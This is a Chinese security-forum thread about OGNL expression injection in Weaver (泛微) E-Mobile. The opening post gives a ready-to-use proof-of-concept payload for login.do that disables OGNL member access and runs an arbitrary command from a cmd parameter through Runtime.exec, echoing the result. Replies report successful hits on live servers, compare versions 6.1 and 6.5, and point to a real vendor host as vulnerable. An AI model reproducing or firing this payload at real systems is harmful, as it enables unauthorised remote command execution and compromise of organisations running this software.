泛微 E-Mobile Ognl 表达式注入
之前在吐司看到这个问题,后来想找原帖没搜到,于是找到了这个
http://www.sh0w.top/index.php/archives/14/
这里说的
- [email protected]@toString(@java.lang.Runtime@getRuntime().exec('whoami').getInputStream())
实际上找了几个e-mobile,做加减法可以成功,一执行上面的代码就直接输出代码了
作者又提到和045很像,我就想了下,算是成功复现出来
貌似无视中间件,可以执行命令,poc如下
http://www.test.com/login.do或者 http://www.test.com/manager/login.do都行
- message=(#[email protected]@DEFAULT_MEMBER_ACCESS).(#w=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(#parameters.cmd[0]).getInputStream()))).(#w.close())&cmd=whoami
版主如果觉得直接贴出来不合适的话,请帮忙加个权限,谢谢
关于作者
F1uYu4n
2篇文章
100篇回复
-
13楼
Rabbittb
昨天 17:18godam0s:貌似6.5不行 6.1可以
| @ta1F1uYu4n:http://e8m.e-cology.com.cn/就是6.5
| @ta2godam0s:我测试了俩6.5都不行 6.1的可以 姿势不对?
| @ta3http://e8m.e-cology.com.cn/ 这个没问题啊
| @ta -
12楼
F1uYu4n
昨天 15:42godam0s:貌似6.5不行 6.1可以
| @ta1F1uYu4n:http://e8m.e-cology.com.cn/就是6.5
| @ta2godam0s:我测试了俩6.5都不行 6.1的可以 姿势不对?
| @ta3pm看下?
| @ta -
11楼
godam0s
昨天 15:38godam0s:
貌似6.5不行 6.1可以
| @ta1F1uYu4n:http://e8m.e-cology.com.cn/就是6.5
| @ta2我测试了俩6.5都不行 6.1的可以 姿势不对?
| @ta -
10楼
skeye7
昨天 15:34
可以做算术题,执行命令总不成功版本5.0不知道是环境的问题还是版本的问题
| @ta -
9楼
F1uYu4n
昨天 15:32godam0s:
貌似6.5不行 6.1可以
| @ta1http://e8m.e-cology.com.cn/就是6.5
| @ta -
8楼
godam0s
昨天 14:58
貌似6.5不行 6.1可以
| @ta -
7楼
building
昨天 14:46试了一下poc,基本都能命中。很强
| @ta -
6楼
byyun189
昨天 14:37
之前有人发过了。不重复?
| @ta -
5楼
wobushou
昨天 13:34可以,可以说修复了S2框架漏洞的,这个参数已经不能命令执行了。
| @ta -
4楼
F1uYu4n
昨天 13:25
@wobushou 刚测了 已经命中
| @ta -
3楼
F1uYu4n
昨天 13:11v_king:
这个就是045吧
| @ta1和045没半毛钱关系
| @ta -
2楼
这只猪
昨天 12:59
沙发,精品东西,谢谢分享,好像前几天某个表哥也发了个泛微的
| @ta -
1楼
v_king
昨天 12:49
这个就是045吧
评论13次